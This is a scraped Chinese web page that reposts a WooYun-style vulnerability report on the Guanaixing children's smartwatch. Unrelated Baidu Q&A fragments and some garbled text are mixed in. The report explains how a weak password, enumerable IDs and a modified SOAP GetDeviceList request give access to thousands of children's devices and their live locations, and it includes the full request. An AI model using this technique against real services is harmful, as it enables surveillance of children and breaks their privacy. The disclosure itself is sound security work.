用的关爱星手表,换了以后注册时微信以前删掉的好友的信息咋删掉

关爱星儿童监听手表存在任意用户登录漏洞
新闻如下/a/16946_0.shtml使用者多为小学生使用关爱星程序后,试出一个弱口令,然后登录抓包。发现登陆后会返回一个id号,所有操作均只要这个id就行,id又是可遍历的。查询设备的数据包如下
POST /OpenAPIV2.asmx HTTP/1.1
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 431
Content-Type: text/ charset=utf-8
Accept-Language: zh-cn
SOAPAction: http://tempuri.org/GetDeviceList
Connection: close
User-Agent: %E5%85%B3%E7%88%B1%E6%98%9F/1.1 CFNetwork/711.1.16 Darwin/14.0.0
99990falseGoogle
修改其中的ID就能获得指定ID的设备信息。测试遍历ID后发现id为20929的用户名下竟然有几千个设备,估计是校长的账号,添加数据包修改规则,把所有请求中的ID替换为校长的ID,实现任意ID登录,效果如图,可看事实位置,可看动态变化,动态信息等等
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】迁安换手表电池去那,就普通手表,换个电池,哪里有这样的小店_百度知道
迁安换手表电池去那,就普通手表,换个电池,哪里有这样的小店
我有更好的答案
一般在本地很难找到这种手表憨海封剿莩济凤汐脯搂小电池,建议网上买比较方便,90%手表都是用COMSAN 626这个型号的。
去火星换吧
地球还没弄明白呢还火星
其他类似问题
为您推荐:
迁安的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁儿童电话手表(关爱星)客服电话手机上显示让我输入手表上的数字为验证码,但我手表上没收到。是怎么回_百度知道
儿童电话手表(关爱星)客服电话手机上显示让我输入手表上的数字为验证码,但我手表上没收到。是怎么回
我有更好的答案
应该是网络原因,等网络好的时候再试试,也可以体验下360儿童卫士
其他类似问题
为您推荐:
客服电话的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁分享漏洞:
披露状态:
: 积极联系厂商并且等待厂商认领中,细节不对外公开
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
关爱星儿童监听手表存在任意用户登录漏洞(可监控小学生用户)
详细说明:
/a/16946_0.shtml
使用者多为小学生
使用关爱星程序后,试出一个弱口令,然后登录抓包。发现登陆后会返回一个id号,所有操作均只要这个id就行,id又是可遍历的。查询设备的数据包如下
code 区域POST /OpenAPIV2.asmx HTTP/1.1
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 431
Content-Type: text/ charset=utf-8
Accept-Language: zh-cn
SOAPAction: http://tempuri.org/GetDeviceList
Connection: close
User-Agent: %E5%85%B3%E7%88%B1%E6%98%9F/1.1 CFNetwork/711.1.16 Darwin/14.0.0
&?xml version=&1.0& encoding=&utf-8&?&
&soap:Envelope xmlns:xsi=&http://www.w3.org/2001/XMLSchema-instance& xmlns:xsd=&http://www.w3.org/2001/XMLSchema& xmlns:soap=&http://schemas.xmlsoap.org/soap/envelope/&&&soap:Body&
&GetDeviceList xmlns=&http://tempuri.org/&&&ID&1&/ID&&PageNo&1&/PageNo&&PageCount&9999&/PageCount&&TypeID&0&/TypeID&&IsAll&false&/IsAll&&MapType&Google&/MapType&&/GetDeviceList&&/soap:Body&
&/soap:Envelope&
修改其中的ID就能获得指定ID的设备信息。
测试遍历ID后发现id为20929的用户名下竟然有几千个设备,估计是校长的账号,
添加数据包修改规则,把所有请求中的ID替换为校长的ID,实现任意ID登录,效果如图,可看事实位置,可看动态变化,动态信息等等
漏洞证明:
修复方案:
版权声明:转载请注明来源 @
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
这就是个监听监控设备啊
登录后才能发表评论,请先

我要回帖

更多关于 关爱星儿童手表注册 的文章

 

随机推荐